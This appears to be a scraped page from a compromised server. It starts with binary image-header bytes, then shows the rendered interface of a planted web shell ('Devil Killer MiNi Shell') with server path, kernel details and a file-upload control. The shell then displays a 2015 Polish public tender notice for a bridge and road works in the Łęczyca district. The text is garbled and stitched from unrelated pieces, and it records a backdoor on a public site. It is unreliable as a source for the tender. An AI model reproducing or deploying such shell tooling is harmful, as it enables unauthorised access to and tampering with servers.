JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150818/212338-N-2015.html

<p class="kh_header"><b>Łęczyca: Przebudowa mostu na kanale Rogulickim, w ciągu drogi powiatowej nr 2512 E 
w miejscowości Orszewice w km 1+650 wraz z dojazdami</b><br>
<b>Numer ogłoszenia: 212338 - 2015; data zamieszczenia: 18.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Łęczycki , ul. Kościuszki 1, 99-100 Łęczyca, woj. łódzkie, tel. 0-24 388-72-00, faks 0-24 721-32-17.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.leczyca.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa mostu na kanale Rogulickim, w ciągu drogi powiatowej nr 2512 E 
w miejscowości Orszewice w km 1+650 wraz z dojazdami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Planowane roboty budowlane przewidziane do wykonania:
1) Przebudowa mostu na Kanale Rogulickim w miejscowości Orszewice w ciągu drogi powiatowej nr 2512E
2) Remont nawierzchni chodników, zjazdów, zatoki autobusowej oraz jezdni drogi powiatowej nr 2523E w Piaskach
3) Przebudowa dróg publicznych w ramach istniejącego pasa drogowego na terenie Powiatu Łęczyckiego.

Ad.1. Zakresem zamówienia objęto przebudowę istniejącego mostu żelbetowego oraz regulację koryta cieku w przekroju mostowym od strony wody górnej i dolnej.
Technologia przebudowy obejmuje następujące główne etapy: zamknięcie mostu dla ruchu publicznego ( pojazdów i pieszych ), rozbiórka ustroju nośnego obiektu, rozbiórka nawierzchni drogi na dojeździe wraz z usunięciem nasypów, rozbiórka skrajnych przyczółków, roboty ziemne, wykonanie przyczółków skrzyniowych, wykonanie ustroju nośnego, wykonanie izolacji przyczółków, wykonanie płyt przejściowych, wykonanie nawierzchni i dylatacji bitumicznych, montaż barier ochronnych, wykonanie umocnień rowów i cieku, odtworzenie istniejących umocnień skarp i dna.

Ad.2. Remont chodników, zjazdow, zatoki autobusowej oraz jezdni drogi powiatowej, odmulenie i oczyszczenie rowów przydrożnych oraz istniejących studzienek kanalizacji deszczowej w miejscowości Piaski gmina Świnice Warckie.
Roboty budowlane przewidują rozbiórkę istniejących krawężników, chodników, zjazdów, zatoki autobusowej, ustawienie krawężników i obrzeży, wykonanie chodników, zjazdów indywidualnych/publicznych, zatoki autobusowej, oznakowania pionowego i poziomego oraz profilu pobocza, oczyszczenie istniejących rowów i studni.

Ad.3. Przebudowa dróg zgodnie z tabelą Lp. Nr drogi - Odcinek drogi (miejscowość) - Długość w mb Gmina Góra św. Małgorzaty 1. 2512 E - Od granicy z gm. Witonia do km1 plus 605 bez mostu na Kanale Rogulickim - 1174 mb 2. 2512E - Orszewice wraz z obrębem skrzyżowania z dr. pow. nr 2516E - 616 mb 3. 2514E - Bryski Kolonia od strony drogi 2513E - 100 mb 4. 2514E - Moraków od strony Czernikowa - 174 mb 5. 2510E - Mętlew od strony Mierczyna - 345 mb 6. 2512E - Góra św. Małgorzaty centrum w kierunku dr. woj. 703 - 498 mb 7. 2512E - Chodnik w m. Góra św. Małgorzaty - 336 mb Gmina Świnice Warckie 1. 2523E - Parski (obustronne dojazdy do mostu na rzece Ner) - 10 mb 2. 2543E - Zbylczyce - (most na rzece Ner) - 37 mb 3. 2545E - Parski - 140 mb 4. 2544E - Grodzisko -90 mb 5. 2540E - Tolów - 652mb 6. 2526E - Chwalborzyce (chodnik) - 500 mb Gmina Miasto Łęczyca 1. 2520E - Łęczyca ul. Lotnicza od SI Tęcza do granic miasta - 413 mb Gmina Piątek 1 2518E i 2514E - Karsznice - Czerników od początku poszerzenia na odcinku 950 mb - 950 mb 2. 2514E - Pokrzywnica most na rzece Struga - 34 mb 3. 2514E - Przepust w m. Czerników na skrzyżowaniu z drogą Moraków-Zabokrzeki - 8 mb 4. 2514E - Poszerzenie jezdni Karsznice - Czerników do granicy gmin - 217 mb.

Zakres prac na powyższych drogach obejmuje:
- mechaniczne czyszczenie i skropienie nawierzchni asfaltem
- frezowanie istniejącej nawierzchni ścieralnej
- wyrównanie istniejącej nawierzchni mieszanką mineralno - asfaltową
- ułożenie nawierzchni z mieszanek mineralno - bitumicznych
- obustronne profilowanie i uzupełnienie poboczy
- wykonanie brakujących odcinków rowów przydrożnych lub pogłębienie rowów istniejących
- przebudowa  i budowa chodników
- remonty przepustów i przyczółków
- przebudowa istniejącego ścieku ulicznego


Planowane roboty mają charakter robót remontowych, na które inwestor uzyskał pozwolenie na budowę ( dotyczy mostu na Kanale Rogulickim ) oraz dokonał zgłoszenia wykonania robót budowlanych  na pozostały zakres zamówienia.


Informacje dodatkowe
- W zakres niniejszego zamówienia wchodzi również organizacja i zagospodarowanie placu budowy wraz z zapleczem z uwagi na bezpieczeństwo osób korzystających z dróg.
- Wykonanie czasowej organizacji ruchu drogowego na czas budowy zgodnie z obowiązującymi przepisami oraz oznakowanie.
- Zaleca się by wykonawca zapoznał się z terenem budowy.
- Obsługa geodezyjna w tym wykonanie geodezyjnej inwentaryzacji powykonawczej dotyczy bezwzględnie  mostu, ul. Lotniczej w Łęczycy, chodnika w m. Piaski oraz m. Góra św. Małgorzaty i w Chwalborzycach w zakresie wykonywanych prac.

Elementami składowymi przedmiotu zamówienia są także wszelkie roboty i usługi towarzyszące realizacji robót, o których mowa powyżej w szczególności: koszty obsługi geodezyjnej, koszty uzyskania niezbędnych badań w tym badanie stopnia zagęszczenia; opinii i uzgodnień, zużycia wody i energii elektrycznej, ubezpieczenia budowy, wszelkich robót przygotowawczych, porządkowych, zabezpieczenia placu budowy, utrzymania zaplecza budowy, doprowadzenia terenu do stanu pierwotnego, wszystkie koszty wywozu materiałów pochodzących z rozbiórki. Cena musi uwzględniać również koszty tablic informacyjnych, dokumentacji geodezyjnej powykonawczej, a także podatek VAT.

Przedmiot zamówienia należy wykonać zgodnie z:
- Dokumentacją projektową przebudowy mostu załącznik Nr 9;
- Dokumentacją projektową chodnika w miejscowości Piaski załącznik Nr 10;
- Przedmiarem robót dróg dojazdowych oraz chodnika w miejscowości Chwalborzyce  i miejscowości Góra św. Małgorzaty  załącznik Nr 11;
- Specyfikacjami technicznymi wykonania i odbioru robót załącznik Nr 12;

Całość robót należy wykonać zgodnie ze sztuką budowlaną, z obowiązującymi przepisami, normami oraz na warunkach ustalonych niniejszą specyfikacją.
Zobowiązuje się Wykonawcę do stosowania materiałów dopuszczonych do obrotu i stosowania w budownictwie, zgodnych z kryteriami technicznymi określonymi w PN i aprobatach technicznych.
Po zakończeniu budowy należy przedstawić: wykaz certyfikatów i świadectw jakości, atesty lub równoważne na materiały budowlane, plan zapewnienia jakości o których mowa w STWiOR, plan bezpieczeństwa i ochrony zdrowia opracowany przez kierownika budowy.
 Znaki towarowe materiałów budowlanych występujące w opisach technicznych i przedmiarach robót wszystkich branż stanowią jedynie przykłady pożądanego standardu i mogą być zastąpione innymi równoważnymi wyrobami producentów nie gorszymi niż wymienione w opisie przedmiotu zamówienia. Zamawiający dopuszcza zastosowanie materiałów i urządzeń innych niż przewidziane w projektach budowlanych z zachowaniem tych samych technologii wykonania, parametrów 
i właściwości technicznych i jakościowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający nie wyklucza zamówień uzupełniających, w przypadku wystąpienia koniecznych prac nieprzewidzianych wynikłych w trakcie realizacji zadania, w przypadkach określonych w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych i wymaga zawarcia odrębnej umowy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.42-6, 45.23.32.22-1, 45.22.11.11-3, 45.10.00.00-8, 45.11.20.00-5, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości 25 000,00 złotych (słownie: dwadzieścia pięć tysięcy złotych).
2.	Wadium obejmuje okres związania ofertą tj. 30 dni od upływu terminu składania ofert. 
3.	Termin wniesienia wadium upływa dnia 01 września 2015 r. o godz. 12:00.
4.	 Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. (tj. Dz. U. z 2014 r. poz. 1804)
5.	W przypadku wnoszenia wadium w pieniądzu, wadium należy wpłacić przelewem na rachunek bankowy Starostwa Powiatowego w Łęczycy:
nr 54 9263 0000 0600 7753 2006 0101</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca złoży stosowne oświadczenie o spełnieniu tego warunku (oświadczenie o spełnianiu warunków art. 22 ust. 1 wg wzoru - załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca:
* wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: 
- co najmniej dwie roboty budowlane polegające na remoncie/przebudowie obiektu inżynierskiego (most, wiadukt), wykonane w ramach odrębnych zadań, każda robota o wartości brutto nie mniejszej niż 600 000,00 zł. 
- co najmniej dwie roboty budowlane polegające na budowie - przebudowie np. chodnika, ciągi pieszo-jezdne, ścieżki rowerowe, placów utwardzonych o nawierzchni z kostki betonowej  oraz  na budowie drogi o nawierzchni asfaltowej o wartości brutto co najmniej 1 500 000,00 zł wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączy dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. - wykaz ważniejszych zamówień zrealizowanych stanowi załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli:
* wykonawca wykaże osobę/osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadające uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej - wykaz osób stanowi załącznik nr 4 do SIWZ;
* wykonawca wykaże, ze dysponuje:  minimum jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności mostowej wymaganymi przepisami ustawy prawo budowlane /jt. Dz. U. Z 2013 poz. 1409 ze zm./ oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dn. 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tj. Dz. U. z 2014  poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i legitymująca sie co najmniej dwuletnim doświadczeniem zawodowym - wykaz osób stanowi załącznik nr 4 do SIWZ; oraz dołączy do oferty
* złoży oświadczenie potwierdzające posiadanie uprawnień przez osoby wymienione w załączniku nr  4 do SIWZ tj. uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej oraz  o specjalności mostowej lub równoważnej - wzór stanowi załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, ze posiada opłaconą polisę lub inny dokument potwierdzający, ze jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500.000,00 zł. Fakt opłacenia polisy musi wynikać z jej treści lub innego załączonego dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Podpisany i wypełniony formularz oferty - Załącznik Nr 1 do SIWZ. 
2. Oświadczenie o spełnianiu warunków art. 22 ust. 1 - Załącznik Nr 2 do SIWZ. 
3. Oświadczenie o nie wykluczeniu na podstawie art. 24 ust. 1 Ustawy - Załącznik Nr 3 do SIWZ. 
4. Zaakceptowany wzór umowy - Załącznik nr 8 do SIWZ. 
5. Jeżeli Wykonawca, w myśl art. 26 ust. 2 b ustawy, polega na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 5. Kosztorys ofertowy sporządzony w oparciu o przedmiary robót zawarte w Załącznikach nr 9, 10, 11 do SIWZ. Kosztorys ofertowy stanowi zestawienie elementów poddanych wycenie i jest wyłącznie elementem pomocniczym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres uzielenia gwarancji jakości na wykonane roboty w zakresie drogowym - 5</li>
<li>3 - Okres uzielenia gwarancji jakości na wykonane roboty w zakresie mostów - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1.  Zmiana terminu realizacji przedmiotu umowy spowodowana:
a) w przypadku przedłużających się procedur związanych z wykorzystaniem przez wykonawców środków ochrony prawnej w zamówieniach publicznych lub innych procedur zamówień publicznych,
b) warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, dokonywanie odbiorów,
c) robotami zamiennymi,
d) koniecznością wprowadzenia zmian w dokumentacji projektowej/technicznej będącej załącznikiem do SIWZ,
e) nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, 
w szczególności w przypadku:
- odmiennych od przyjętych w dokumentacji technicznej warunków geologicznych,
- odmiennych od przyjętych w dokumentacji technicznej warunków terenowych,
- istnienia niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych, podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych
